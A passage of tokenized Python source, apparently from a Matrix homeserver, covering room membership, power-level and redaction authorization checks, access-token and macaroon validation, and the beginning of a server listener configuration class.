_check_power_levels ( event , auth_events ) <EOL> if event . type == EventTypes . Redaction : <EOL> self . check_redaction ( event , auth_events ) <EOL> logger . debug ( "<STR_LIT>" , event ) <EOL> except AuthError as e : <EOL> logger . info ( <EOL> "<STR_LIT>" , <EOL> event , e . msg <EOL> ) <EOL> logger . info ( "<STR_LIT>" , event ) <EOL> raise <EOL> def check_size_limits ( self , event ) : <EOL> def too_big ( field ) : <EOL> raise EventSizeError ( "<STR_LIT>" % ( field , ) ) <EOL> if len ( event . user_id ) > <NUM_LIT:255> : <EOL> too_big ( "<STR_LIT>" ) <EOL> if len ( event . room_id ) > <NUM_LIT:255> : <EOL> too_big ( "<STR_LIT>" ) <EOL> if event . is_state ( ) and len ( event . state_key ) > <NUM_LIT:255> : <EOL> too_big ( "<STR_LIT>" ) <EOL> if len ( event . type ) > <NUM_LIT:255> : <EOL> too_big ( "<STR_LIT:type>" ) <EOL> if len ( event . event_id ) > <NUM_LIT:255> : <EOL> too_big ( "<STR_LIT>" ) <EOL> if len ( encode_canonical_json ( event . 
get_pdu_json ( ) ) ) > <NUM_LIT> : <EOL> too_big ( "<STR_LIT>" ) <EOL> @ defer . inlineCallbacks <EOL> def check_joined_room ( self , room_id , user_id , current_state = None ) : <EOL> """<STR_LIT>""" <EOL> if current_state : <EOL> member = current_state . get ( <EOL> ( EventTypes . Member , user_id ) , <EOL> None <EOL> ) <EOL> else : <EOL> member = yield self . state . get_current_state ( <EOL> room_id = room_id , <EOL> event_type = EventTypes . Member , <EOL> state_key = user_id <EOL> ) <EOL> self . _check_joined_room ( member , user_id , room_id ) <EOL> defer . returnValue ( member ) <EOL> @ defer . inlineCallbacks <EOL> def check_user_was_in_room ( self , room_id , user_id ) : <EOL> """<STR_LIT>""" <EOL> member = yield self . state . get_current_state ( <EOL> room_id = room_id , <EOL> event_type = EventTypes . Member , <EOL> state_key = user_id <EOL> ) <EOL> membership = member . membership if member else None <EOL> if membership not in ( Membership . JOIN , Membership . LEAVE ) : <EOL> raise AuthError ( <NUM_LIT> , "<STR_LIT>" % ( <EOL> user_id , room_id <EOL> ) ) <EOL> if membership == Membership . LEAVE : <EOL> forgot = yield self . store . did_forget ( user_id , room_id ) <EOL> if forgot : <EOL> raise AuthError ( <NUM_LIT> , "<STR_LIT>" % ( <EOL> user_id , room_id <EOL> ) ) <EOL> defer . returnValue ( member ) <EOL> @ defer . inlineCallbacks <EOL> def check_host_in_room ( self , room_id , host ) : <EOL> curr_state = yield self . state . get_current_state ( room_id ) <EOL> for event in curr_state . values ( ) : <EOL> if event . type == EventTypes . Member : <EOL> try : <EOL> if UserID . from_string ( event . state_key ) . domain != host : <EOL> continue <EOL> except : <EOL> logger . warn ( "<STR_LIT>" , event . state_key ) <EOL> continue <EOL> if event . content [ "<STR_LIT>" ] == Membership . JOIN : <EOL> defer . returnValue ( True ) <EOL> defer . 
returnValue ( False ) <EOL> def check_event_sender_in_room ( self , event , auth_events ) : <EOL> key = ( EventTypes . Member , event . user_id , ) <EOL> member_event = auth_events . get ( key ) <EOL> return self . _check_joined_room ( <EOL> member_event , <EOL> event . user_id , <EOL> event . room_id <EOL> ) <EOL> def _check_joined_room ( self , member , user_id , room_id ) : <EOL> if not member or member . membership != Membership . JOIN : <EOL> raise AuthError ( <NUM_LIT> , "<STR_LIT>" % ( <EOL> user_id , room_id , repr ( member ) <EOL> ) ) <EOL> def can_federate ( self , event , auth_events ) : <EOL> creation_event = auth_events . get ( ( EventTypes . Create , "<STR_LIT>" ) ) <EOL> return creation_event . content . get ( "<STR_LIT>" , True ) is True <EOL> @ log_function <EOL> def is_membership_change_allowed ( self , event , auth_events ) : <EOL> membership = event . content [ "<STR_LIT>" ] <EOL> if len ( event . prev_events ) == <NUM_LIT:1> and Membership . JOIN == membership : <EOL> key = ( EventTypes . Create , "<STR_LIT>" , ) <EOL> create = auth_events . get ( key ) <EOL> if create and event . prev_events [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] == create . event_id : <EOL> if create . content [ "<STR_LIT>" ] == event . state_key : <EOL> return True <EOL> target_user_id = event . state_key <EOL> creating_domain = RoomID . from_string ( event . room_id ) . domain <EOL> target_domain = UserID . from_string ( target_user_id ) . domain <EOL> if creating_domain != target_domain : <EOL> if not self . can_federate ( event , auth_events ) : <EOL> raise AuthError ( <EOL> <NUM_LIT> , <EOL> "<STR_LIT>" <EOL> ) <EOL> key = ( EventTypes . Member , event . user_id , ) <EOL> caller = auth_events . get ( key ) <EOL> caller_in_room = caller and caller . membership == Membership . JOIN <EOL> caller_invited = caller and caller . membership == Membership . INVITE <EOL> key = ( EventTypes . Member , target_user_id , ) <EOL> target = auth_events . 
get ( key ) <EOL> target_in_room = target and target . membership == Membership . JOIN <EOL> target_banned = target and target . membership == Membership . BAN <EOL> key = ( EventTypes . JoinRules , "<STR_LIT>" , ) <EOL> join_rule_event = auth_events . get ( key ) <EOL> if join_rule_event : <EOL> join_rule = join_rule_event . content . get ( <EOL> "<STR_LIT>" , JoinRules . INVITE <EOL> ) <EOL> else : <EOL> join_rule = JoinRules . INVITE <EOL> user_level = self . _get_user_power_level ( event . user_id , auth_events ) <EOL> target_level = self . _get_user_power_level ( <EOL> target_user_id , auth_events <EOL> ) <EOL> ban_level = self . _get_named_level ( auth_events , "<STR_LIT>" , <NUM_LIT:50> ) <EOL> logger . debug ( <EOL> "<STR_LIT>" , <EOL> { <EOL> "<STR_LIT>" : caller_in_room , <EOL> "<STR_LIT>" : caller_invited , <EOL> "<STR_LIT>" : target_banned , <EOL> "<STR_LIT>" : target_in_room , <EOL> "<STR_LIT>" : membership , <EOL> "<STR_LIT>" : join_rule , <EOL> "<STR_LIT>" : target_user_id , <EOL> "<STR_LIT>" : event . user_id , <EOL> } <EOL> ) <EOL> if Membership . INVITE == membership and "<STR_LIT>" in event . content : <EOL> if not self . _verify_third_party_invite ( event , auth_events ) : <EOL> raise AuthError ( <NUM_LIT> , "<STR_LIT>" ) <EOL> return True <EOL> if Membership . JOIN != membership : <EOL> if ( caller_invited <EOL> and Membership . LEAVE == membership <EOL> and target_user_id == event . user_id ) : <EOL> return True <EOL> if not caller_in_room : <EOL> raise AuthError ( <EOL> <NUM_LIT> , <EOL> "<STR_LIT>" % ( event . user_id , event . room_id , ) <EOL> ) <EOL> if Membership . INVITE == membership : <EOL> if target_banned : <EOL> raise AuthError ( <EOL> <NUM_LIT> , "<STR_LIT>" % ( target_user_id , ) <EOL> ) <EOL> elif target_in_room : <EOL> raise AuthError ( <NUM_LIT> , "<STR_LIT>" % <EOL> target_user_id ) <EOL> else : <EOL> invite_level = self . 
_get_named_level ( auth_events , "<STR_LIT>" , <NUM_LIT:0> ) <EOL> if user_level < invite_level : <EOL> raise AuthError ( <EOL> <NUM_LIT> , "<STR_LIT>" % target_user_id <EOL> ) <EOL> elif Membership . JOIN == membership : <EOL> if event . user_id != target_user_id : <EOL> raise AuthError ( <NUM_LIT> , "<STR_LIT>" ) <EOL> elif target_banned : <EOL> raise AuthError ( <NUM_LIT> , "<STR_LIT>" ) <EOL> elif join_rule == JoinRules . PUBLIC : <EOL> pass <EOL> elif join_rule == JoinRules . INVITE : <EOL> if not caller_in_room and not caller_invited : <EOL> raise AuthError ( <NUM_LIT> , "<STR_LIT>" ) <EOL> else : <EOL> raise AuthError ( <NUM_LIT> , "<STR_LIT>" ) <EOL> elif Membership . LEAVE == membership : <EOL> if target_banned and user_level < ban_level : <EOL> raise AuthError ( <EOL> <NUM_LIT> , "<STR_LIT>" % ( target_user_id , ) <EOL> ) <EOL> elif target_user_id != event . user_id : <EOL> kick_level = self . _get_named_level ( auth_events , "<STR_LIT>" , <NUM_LIT:50> ) <EOL> if user_level < kick_level or user_level <= target_level : <EOL> raise AuthError ( <EOL> <NUM_LIT> , "<STR_LIT>" % target_user_id <EOL> ) <EOL> elif Membership . BAN == membership : <EOL> if user_level < ban_level or user_level <= target_level : <EOL> raise AuthError ( <NUM_LIT> , "<STR_LIT>" ) <EOL> else : <EOL> raise AuthError ( <NUM_LIT> , "<STR_LIT>" % membership ) <EOL> return True <EOL> def _verify_third_party_invite ( self , event , auth_events ) : <EOL> """<STR_LIT>""" <EOL> if "<STR_LIT>" not in event . content : <EOL> return False <EOL> if "<STR_LIT>" not in event . content [ "<STR_LIT>" ] : <EOL> return False <EOL> signed = event . content [ "<STR_LIT>" ] [ "<STR_LIT>" ] <EOL> for key in { "<STR_LIT>" , "<STR_LIT>" } : <EOL> if key not in signed : <EOL> return False <EOL> token = signed [ "<STR_LIT>" ] <EOL> invite_event = auth_events . get ( <EOL> ( EventTypes . ThirdPartyInvite , token , ) <EOL> ) <EOL> if not invite_event : <EOL> return False <EOL> if event . user_id != invite_event . 
user_id : <EOL> return False <EOL> if signed [ "<STR_LIT>" ] != event . state_key : <EOL> return False <EOL> if signed [ "<STR_LIT>" ] != token : <EOL> return False <EOL> for public_key_object in self . get_public_keys ( invite_event ) : <EOL> public_key = public_key_object [ "<STR_LIT>" ] <EOL> try : <EOL> for server , signature_block in signed [ "<STR_LIT>" ] . items ( ) : <EOL> for key_name , encoded_signature in signature_block . items ( ) : <EOL> if not key_name . startswith ( "<STR_LIT>" ) : <EOL> continue <EOL> verify_key = decode_verify_key_bytes ( <EOL> key_name , <EOL> decode_base64 ( public_key ) <EOL> ) <EOL> verify_signed_json ( signed , server , verify_key ) <EOL> return True <EOL> except ( KeyError , SignatureVerifyException , ) : <EOL> continue <EOL> return False <EOL> def get_public_keys ( self , invite_event ) : <EOL> public_keys = [ ] <EOL> if "<STR_LIT>" in invite_event . content : <EOL> o = { <EOL> "<STR_LIT>" : invite_event . content [ "<STR_LIT>" ] , <EOL> } <EOL> if "<STR_LIT>" in invite_event . content : <EOL> o [ "<STR_LIT>" ] = invite_event . content [ "<STR_LIT>" ] <EOL> public_keys . append ( o ) <EOL> public_keys . extend ( invite_event . content . get ( "<STR_LIT>" , [ ] ) ) <EOL> return public_keys <EOL> def _get_power_level_event ( self , auth_events ) : <EOL> key = ( EventTypes . PowerLevels , "<STR_LIT>" , ) <EOL> return auth_events . get ( key ) <EOL> def _get_user_power_level ( self , user_id , auth_events ) : <EOL> power_level_event = self . _get_power_level_event ( auth_events ) <EOL> if power_level_event : <EOL> level = power_level_event . content . get ( "<STR_LIT>" , { } ) . get ( user_id ) <EOL> if not level : <EOL> level = power_level_event . content . get ( "<STR_LIT>" , <NUM_LIT:0> ) <EOL> if level is None : <EOL> return <NUM_LIT:0> <EOL> else : <EOL> return int ( level ) <EOL> else : <EOL> key = ( EventTypes . Create , "<STR_LIT>" , ) <EOL> create_event = auth_events . 
get ( key ) <EOL> if ( create_event is not None and <EOL> create_event . content [ "<STR_LIT>" ] == user_id ) : <EOL> return <NUM_LIT:100> <EOL> else : <EOL> return <NUM_LIT:0> <EOL> def _get_named_level ( self , auth_events , name , default ) : <EOL> power_level_event = self . _get_power_level_event ( auth_events ) <EOL> if not power_level_event : <EOL> return default <EOL> level = power_level_event . content . get ( name , None ) <EOL> if level is not None : <EOL> return int ( level ) <EOL> else : <EOL> return default <EOL> @ defer . inlineCallbacks <EOL> def get_user_by_req ( self , request , allow_guest = False ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> user_id = yield self . _get_appservice_user_id ( request . args ) <EOL> if user_id : <EOL> request . authenticated_entity = user_id <EOL> defer . returnValue ( <EOL> Requester ( UserID . from_string ( user_id ) , "<STR_LIT>" , False ) <EOL> ) <EOL> access_token = request . args [ "<STR_LIT>" ] [ <NUM_LIT:0> ] <EOL> user_info = yield self . get_user_by_access_token ( access_token ) <EOL> user = user_info [ "<STR_LIT:user>" ] <EOL> token_id = user_info [ "<STR_LIT>" ] <EOL> is_guest = user_info [ "<STR_LIT>" ] <EOL> ip_addr = self . hs . get_ip_from_request ( request ) <EOL> user_agent = request . requestHeaders . getRawHeaders ( <EOL> "<STR_LIT>" , <EOL> default = [ "<STR_LIT>" ] <EOL> ) [ <NUM_LIT:0> ] <EOL> if user and access_token and ip_addr : <EOL> preserve_context_over_fn ( <EOL> self . store . insert_client_ip , <EOL> user = user , <EOL> access_token = access_token , <EOL> ip = ip_addr , <EOL> user_agent = user_agent <EOL> ) <EOL> if is_guest and not allow_guest : <EOL> raise AuthError ( <EOL> <NUM_LIT> , "<STR_LIT>" , errcode = Codes . GUEST_ACCESS_FORBIDDEN <EOL> ) <EOL> request . authenticated_entity = user . to_string ( ) <EOL> defer . returnValue ( Requester ( user , token_id , is_guest ) ) <EOL> except KeyError : <EOL> raise AuthError ( <EOL> self . 
TOKEN_NOT_FOUND_HTTP_STATUS , "<STR_LIT>" , <EOL> errcode = Codes . MISSING_TOKEN <EOL> ) <EOL> @ defer . inlineCallbacks <EOL> def _get_appservice_user_id ( self , request_args ) : <EOL> app_service = yield self . store . get_app_service_by_token ( <EOL> request_args [ "<STR_LIT>" ] [ <NUM_LIT:0> ] <EOL> ) <EOL> if app_service is None : <EOL> defer . returnValue ( None ) <EOL> if "<STR_LIT>" not in request_args : <EOL> defer . returnValue ( app_service . sender ) <EOL> user_id = request_args [ "<STR_LIT>" ] [ <NUM_LIT:0> ] <EOL> if app_service . sender == user_id : <EOL> defer . returnValue ( app_service . sender ) <EOL> if not app_service . is_interested_in_user ( user_id ) : <EOL> raise AuthError ( <EOL> <NUM_LIT> , <EOL> "<STR_LIT>" <EOL> ) <EOL> if not ( yield self . store . get_user_by_id ( user_id ) ) : <EOL> raise AuthError ( <EOL> <NUM_LIT> , <EOL> "<STR_LIT>" <EOL> ) <EOL> defer . returnValue ( user_id ) <EOL> @ defer . inlineCallbacks <EOL> def get_user_by_access_token ( self , token ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> ret = yield self . get_user_from_macaroon ( token ) <EOL> except AuthError : <EOL> ret = yield self . _look_up_user_by_access_token ( token ) <EOL> defer . returnValue ( ret ) <EOL> @ defer . inlineCallbacks <EOL> def get_user_from_macaroon ( self , macaroon_str ) : <EOL> try : <EOL> macaroon = pymacaroons . Macaroon . deserialize ( macaroon_str ) <EOL> self . validate_macaroon ( macaroon , "<STR_LIT>" , False ) <EOL> user_prefix = "<STR_LIT>" <EOL> user = None <EOL> guest = False <EOL> for caveat in macaroon . caveats : <EOL> if caveat . caveat_id . startswith ( user_prefix ) : <EOL> user = UserID . from_string ( caveat . caveat_id [ len ( user_prefix ) : ] ) <EOL> elif caveat . caveat_id == "<STR_LIT>" : <EOL> guest = True <EOL> if user is None : <EOL> raise AuthError ( <EOL> self . TOKEN_NOT_FOUND_HTTP_STATUS , "<STR_LIT>" , <EOL> errcode = Codes . 
UNKNOWN_TOKEN <EOL> ) <EOL> if guest : <EOL> ret = { <EOL> "<STR_LIT:user>" : user , <EOL> "<STR_LIT>" : True , <EOL> "<STR_LIT>" : None , <EOL> } <EOL> else : <EOL> ret = yield self . _look_up_user_by_access_token ( macaroon_str ) <EOL> if ret [ "<STR_LIT:user>" ] != user : <EOL> logger . error ( <EOL> "<STR_LIT>" , <EOL> user , <EOL> ret [ "<STR_LIT:user>" ] <EOL> ) <EOL> raise AuthError ( <EOL> self . TOKEN_NOT_FOUND_HTTP_STATUS , <EOL> "<STR_LIT>" , <EOL> errcode = Codes . UNKNOWN_TOKEN <EOL> ) <EOL> defer . returnValue ( ret ) <EOL> except ( pymacaroons . exceptions . MacaroonException , TypeError , ValueError ) : <EOL> raise AuthError ( <EOL> self . TOKEN_NOT_FOUND_HTTP_STATUS , "<STR_LIT>" , <EOL> errcode = Codes . UNKNOWN_TOKEN <EOL> ) <EOL> def validate_macaroon ( self , macaroon , type_string , verify_expiry ) : <EOL> """<STR_LIT>""" <EOL> v = pymacaroons . Verifier ( ) <EOL> v . satisfy_exact ( "<STR_LIT>" ) <EOL> v . satisfy_exact ( "<STR_LIT>" + type_string ) <EOL> v . satisfy_general ( lambda c : c . startswith ( "<STR_LIT>" ) ) <EOL> v . satisfy_exact ( "<STR_LIT>" ) <EOL> if verify_expiry : <EOL> v . satisfy_general ( self . _verify_expiry ) <EOL> else : <EOL> v . satisfy_general ( lambda c : c . startswith ( "<STR_LIT>" ) ) <EOL> v . verify ( macaroon , self . hs . config . macaroon_secret_key ) <EOL> v = pymacaroons . Verifier ( ) <EOL> v . satisfy_general ( self . _verify_recognizes_caveats ) <EOL> v . verify ( macaroon , self . hs . config . macaroon_secret_key ) <EOL> def _verify_expiry ( self , caveat ) : <EOL> prefix = "<STR_LIT>" <EOL> if not caveat . startswith ( prefix ) : <EOL> return False <EOL> expiry = int ( caveat [ len ( prefix ) : ] ) <EOL> now = self . hs . get_clock ( ) . time_msec ( ) <EOL> return now < expiry <EOL> def _verify_recognizes_caveats ( self , caveat ) : <EOL> first_space = caveat . find ( "<STR_LIT:U+0020>" ) <EOL> if first_space < <NUM_LIT:0> : <EOL> return False <EOL> second_space = caveat . 
find ( "<STR_LIT:U+0020>" , first_space + <NUM_LIT:1> ) <EOL> if second_space < <NUM_LIT:0> : <EOL> return False <EOL> return caveat [ : second_space + <NUM_LIT:1> ] in self . _KNOWN_CAVEAT_PREFIXES <EOL> @ defer . inlineCallbacks <EOL> def _look_up_user_by_access_token ( self , token ) : <EOL> ret = yield self . store . get_user_by_access_token ( token ) <EOL> if not ret : <EOL> logger . warn ( "<STR_LIT>" % ( token , ) ) <EOL> raise AuthError ( <EOL> self . TOKEN_NOT_FOUND_HTTP_STATUS , "<STR_LIT>" , <EOL> errcode = Codes . UNKNOWN_TOKEN <EOL> ) <EOL> user_info = { <EOL> "<STR_LIT:user>" : UserID . from_string ( ret . get ( "<STR_LIT:name>" ) ) , <EOL> "<STR_LIT>" : ret . get ( "<STR_LIT>" , None ) , <EOL> "<STR_LIT>" : False , <EOL> } <EOL> defer . returnValue ( user_info ) <EOL> @ defer . inlineCallbacks <EOL> def get_appservice_by_req ( self , request ) : <EOL> try : <EOL> token = request . args [ "<STR_LIT>" ] [ <NUM_LIT:0> ] <EOL> service = yield self . store . get_app_service_by_token ( token ) <EOL> if not service : <EOL> logger . warn ( "<STR_LIT>" % ( token , ) ) <EOL> raise AuthError ( <EOL> self . TOKEN_NOT_FOUND_HTTP_STATUS , <EOL> "<STR_LIT>" , <EOL> errcode = Codes . UNKNOWN_TOKEN <EOL> ) <EOL> request . authenticated_entity = service . sender <EOL> defer . returnValue ( service ) <EOL> except KeyError : <EOL> raise AuthError ( <EOL> self . TOKEN_NOT_FOUND_HTTP_STATUS , "<STR_LIT>" <EOL> ) <EOL> def is_server_admin ( self , user ) : <EOL> return self . store . is_server_admin ( user ) <EOL> @ defer . inlineCallbacks <EOL> def add_auth_events ( self , builder , context ) : <EOL> auth_ids = self . compute_auth_events ( builder , context . current_state ) <EOL> auth_events_entries = yield self . store . add_event_hashes ( <EOL> auth_ids <EOL> ) <EOL> builder . auth_events = auth_events_entries <EOL> def compute_auth_events ( self , event , current_state ) : <EOL> if event . type == EventTypes . 
Create : <EOL> return [ ] <EOL> auth_ids = [ ] <EOL> key = ( EventTypes . PowerLevels , "<STR_LIT>" , ) <EOL> power_level_event = current_state . get ( key ) <EOL> if power_level_event : <EOL> auth_ids . append ( power_level_event . event_id ) <EOL> key = ( EventTypes . JoinRules , "<STR_LIT>" , ) <EOL> join_rule_event = current_state . get ( key ) <EOL> key = ( EventTypes . Member , event . user_id , ) <EOL> member_event = current_state . get ( key ) <EOL> key = ( EventTypes . Create , "<STR_LIT>" , ) <EOL> create_event = current_state . get ( key ) <EOL> if create_event : <EOL> auth_ids . append ( create_event . event_id ) <EOL> if join_rule_event : <EOL> join_rule = join_rule_event . content . get ( "<STR_LIT>" ) <EOL> is_public = join_rule == JoinRules . PUBLIC if join_rule else False <EOL> else : <EOL> is_public = False <EOL> if event . type == EventTypes . Member : <EOL> e_type = event . content [ "<STR_LIT>" ] <EOL> if e_type in [ Membership . JOIN , Membership . INVITE ] : <EOL> if join_rule_event : <EOL> auth_ids . append ( join_rule_event . event_id ) <EOL> if e_type == Membership . JOIN : <EOL> if member_event and not is_public : <EOL> auth_ids . append ( member_event . event_id ) <EOL> else : <EOL> if member_event : <EOL> auth_ids . append ( member_event . event_id ) <EOL> if e_type == Membership . INVITE : <EOL> if "<STR_LIT>" in event . content : <EOL> key = ( <EOL> EventTypes . ThirdPartyInvite , <EOL> event . content [ "<STR_LIT>" ] [ "<STR_LIT>" ] [ "<STR_LIT>" ] <EOL> ) <EOL> third_party_invite = current_state . get ( key ) <EOL> if third_party_invite : <EOL> auth_ids . append ( third_party_invite . event_id ) <EOL> elif member_event : <EOL> if member_event . content [ "<STR_LIT>" ] == Membership . JOIN : <EOL> auth_ids . append ( member_event . event_id ) <EOL> return auth_ids <EOL> def _get_send_level ( self , etype , state_key , auth_events ) : <EOL> key = ( EventTypes . PowerLevels , "<STR_LIT>" , ) <EOL> send_level_event = auth_events . 
get ( key ) <EOL> send_level = None <EOL> if send_level_event : <EOL> send_level = send_level_event . content . get ( "<STR_LIT>" , { } ) . get ( <EOL> etype <EOL> ) <EOL> if send_level is None : <EOL> if state_key is not None : <EOL> send_level = send_level_event . content . get ( <EOL> "<STR_LIT>" , <NUM_LIT:50> <EOL> ) <EOL> else : <EOL> send_level = send_level_event . content . get ( <EOL> "<STR_LIT>" , <NUM_LIT:0> <EOL> ) <EOL> if send_level : <EOL> send_level = int ( send_level ) <EOL> else : <EOL> send_level = <NUM_LIT:0> <EOL> return send_level <EOL> @ log_function <EOL> def _can_send_event ( self , event , auth_events ) : <EOL> send_level = self . _get_send_level ( <EOL> event . type , event . get ( "<STR_LIT>" , None ) , auth_events <EOL> ) <EOL> user_level = self . _get_user_power_level ( event . user_id , auth_events ) <EOL> if user_level < send_level : <EOL> raise AuthError ( <EOL> <NUM_LIT> , <EOL> "<STR_LIT>" + <EOL> "<STR_LIT>" % ( user_level , send_level ) <EOL> ) <EOL> if hasattr ( event , "<STR_LIT>" ) : <EOL> if event . state_key . startswith ( "<STR_LIT:@>" ) : <EOL> if event . state_key != event . user_id : <EOL> raise AuthError ( <EOL> <NUM_LIT> , <EOL> "<STR_LIT>" <EOL> ) <EOL> else : <EOL> sender_domain = UserID . from_string ( <EOL> event . user_id <EOL> ) . domain <EOL> if sender_domain != event . state_key : <EOL> raise AuthError ( <EOL> <NUM_LIT> , <EOL> "<STR_LIT>" <EOL> ) <EOL> return True <EOL> def check_redaction ( self , event , auth_events ) : <EOL> """<STR_LIT>""" <EOL> user_level = self . _get_user_power_level ( event . user_id , auth_events ) <EOL> redact_level = self . _get_named_level ( auth_events , "<STR_LIT>" , <NUM_LIT:50> ) <EOL> if user_level >= redact_level : <EOL> return False <EOL> redacter_domain = EventID . from_string ( event . event_id ) . domain <EOL> redactee_domain = EventID . from_string ( event . redacts ) . 
domain <EOL> if redacter_domain == redactee_domain : <EOL> return True <EOL> raise AuthError ( <EOL> <NUM_LIT> , <EOL> "<STR_LIT>" <EOL> ) <EOL> def _check_power_levels ( self , event , auth_events ) : <EOL> user_list = event . content . get ( "<STR_LIT>" , { } ) <EOL> for k , v in user_list . items ( ) : <EOL> try : <EOL> UserID . from_string ( k ) <EOL> except : <EOL> raise SynapseError ( <NUM_LIT> , "<STR_LIT>" % ( k , ) ) <EOL> try : <EOL> int ( v ) <EOL> except : <EOL> raise SynapseError ( <NUM_LIT> , "<STR_LIT>" % ( v , ) ) <EOL> key = ( event . type , event . state_key , ) <EOL> current_state = auth_events . get ( key ) <EOL> if not current_state : <EOL> return <EOL> user_level = self . _get_user_power_level ( event . user_id , auth_events ) <EOL> levels_to_check = [ <EOL> ( "<STR_LIT>" , None ) , <EOL> ( "<STR_LIT>" , None ) , <EOL> ( "<STR_LIT>" , None ) , <EOL> ( "<STR_LIT>" , None ) , <EOL> ( "<STR_LIT>" , None ) , <EOL> ( "<STR_LIT>" , None ) , <EOL> ( "<STR_LIT>" , None ) , <EOL> ] <EOL> old_list = current_state . content . get ( "<STR_LIT>" ) <EOL> for user in set ( old_list . keys ( ) + user_list . keys ( ) ) : <EOL> levels_to_check . append ( <EOL> ( user , "<STR_LIT>" ) <EOL> ) <EOL> old_list = current_state . content . get ( "<STR_LIT>" ) <EOL> new_list = event . content . get ( "<STR_LIT>" ) <EOL> for ev_id in set ( old_list . keys ( ) + new_list . keys ( ) ) : <EOL> levels_to_check . append ( <EOL> ( ev_id , "<STR_LIT>" ) <EOL> ) <EOL> old_state = current_state . content <EOL> new_state = event . content <EOL> for level_to_check , dir in levels_to_check : <EOL> old_loc = old_state <EOL> new_loc = new_state <EOL> if dir : <EOL> old_loc = old_loc . get ( dir , { } ) <EOL> new_loc = new_loc . 
get ( dir , { } ) <EOL> if level_to_check in old_loc : <EOL> old_level = int ( old_loc [ level_to_check ] ) <EOL> else : <EOL> old_level = None <EOL> if level_to_check in new_loc : <EOL> new_level = int ( new_loc [ level_to_check ] ) <EOL> else : <EOL> new_level = None <EOL> if new_level is not None and old_level is not None : <EOL> if new_level == old_level : <EOL> continue <EOL> if dir == "<STR_LIT>" and level_to_check != event . user_id : <EOL> if old_level == user_level : <EOL> raise AuthError ( <EOL> <NUM_LIT> , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> if old_level > user_level or new_level > user_level : <EOL> raise AuthError ( <EOL> <NUM_LIT> , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> @ defer . inlineCallbacks <EOL> def check_can_change_room_list ( self , room_id , user ) : <EOL> """<STR_LIT>""" <EOL> is_admin = yield self . is_server_admin ( user ) <EOL> if is_admin : <EOL> defer . returnValue ( True ) <EOL> user_id = user . to_string ( ) <EOL> yield self . check_joined_room ( room_id , user_id ) <EOL> power_level_event = yield self . state . get_current_state ( <EOL> room_id , EventTypes . PowerLevels , "<STR_LIT>" <EOL> ) <EOL> auth_events = { } <EOL> if power_level_event : <EOL> auth_events [ ( EventTypes . PowerLevels , "<STR_LIT>" ) ] = power_level_event <EOL> send_level = self . _get_send_level ( <EOL> EventTypes . Aliases , "<STR_LIT>" , auth_events <EOL> ) <EOL> user_level = self . _get_user_power_level ( user_id , auth_events ) <EOL> if user_level < send_level : <EOL> raise AuthError ( <EOL> <NUM_LIT> , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) </s>
<s> from . _base import Config <EOL> class ServerConfig ( Config ) : <EOL> def read_config ( self , config ) : <EOL> self . server_name = config [ "<STR_LIT>" ] <EOL> self . pid_file = self . abspath ( config . get ( "<STR_LIT>" ) ) <EOL> self . web_client = config [ "<STR_LIT>" ] <EOL> self . web_client_location = config . get ( "<STR_LIT>" , None ) <EOL> self . soft_file_limit = config [ "<STR_LIT>" ] <EOL> self . daemonize = config . get ( "<STR_LIT>" ) <EOL> self . print_pidfile = config . get ( "<STR_LIT>" ) <EOL> self . user_agent_suffix = config . get ( "<STR_LIT>" ) <EOL> self . use_frozen_dicts = config . get ( "<STR_LIT>" , True ) <EOL> self . listeners = config . get ( "<STR_LIT>" , [ ] ) <EOL> bind_port = config . get ( "<STR_LIT>" ) <EOL> if bind_port : <EOL> self . listeners = [ ] <EOL> bind_host = config . get ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> gzip_responses = config . get ( "<STR_LIT>" , True ) <EOL> names = [ "<STR_LIT>" , "<STR_LIT>" ] if self . web_client else [ "<STR_LIT>" ] <EOL> self . listeners . append ( { <EOL> "<STR_LIT:port>" : bind_port , <EOL> "<STR_LIT>" : bind_host , <EOL> "<STR_LIT>" : True , <EOL> "<STR_LIT:type>" : "<STR_LIT:http>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : names , <EOL> "<STR_LIT>" : gzip_responses , <EOL> } , <EOL> { <EOL> "<STR_LIT>" : [ "<STR_LIT>" ] , <EOL> "<STR_LIT>" : False , <EOL> } <EOL> ] <EOL> } ) <EOL> unsecure_port = config . get ( "<STR_LIT>" , bind_port - <NUM_LIT> ) <EOL> if unsecure_port : <EOL> self . listeners . append ( { <EOL> "<STR_LIT:port>" : unsecure_port , <EOL> "<STR_LIT>" : bind_host , <EOL> "<STR_LIT>" : False , <EOL> "<STR_LIT:type>" : "<STR_LIT:http>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : names , <EOL> "<STR_LIT>" : gzip_responses , <EOL> } , <EOL> { <EOL> "<STR_LIT>" : [ "<STR_LIT>" ] , <EOL> "<STR_LIT>" : False , <EOL> } <EOL> ] <EOL> } ) <EOL> manhole = config . get ( "<STR_LIT>" ) <EOL> if manhole : <EOL> self . listeners . 
append ( { <EOL> "<STR_LIT:port>" : manhole , <EOL> "<STR_LIT>" : "<STR_LIT:127.0.0.1>" , <EOL> "<STR_LIT:type>" : "<STR_LIT>" , <EOL> } ) <EOL> metrics_port = config . get ( "<STR_LIT>" ) <EOL> if metrics_port : <EOL> self . listeners . append ( { <EOL> "<STR_LIT:port>" : metrics_port , <EOL> "<STR_LIT>" : config . get ( "<STR_LIT>" , "<STR_LIT:127.0.0.1>" ) , <EOL> "<STR_LIT>" : False , <EOL> "<STR_LIT:type>" : "<STR_LIT:http>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : [ "<STR_LIT>" ] , <EOL> "<STR_LIT>" : False , <EOL> } , <EOL> ] <EOL> } ) <EOL> content_addr = config . get ( "<STR_LIT>" ) <EOL> if not content_addr : <EOL> for listener in self . listeners : <EOL> if listener [ "<STR_LIT:type>" ] == "<STR_LIT:http>" and not listener . get ( "<STR_LIT>" , False ) : <EOL> unsecure_port = listener [ "<STR_LIT:port>" ] <EOL> break <EOL> else : <EOL> raise RuntimeError ( "<STR_LIT>" ) <EOL> host = self . server_name <EOL> if '<STR_LIT::>' not in host : <EOL> host = "<STR_LIT>" % ( host , 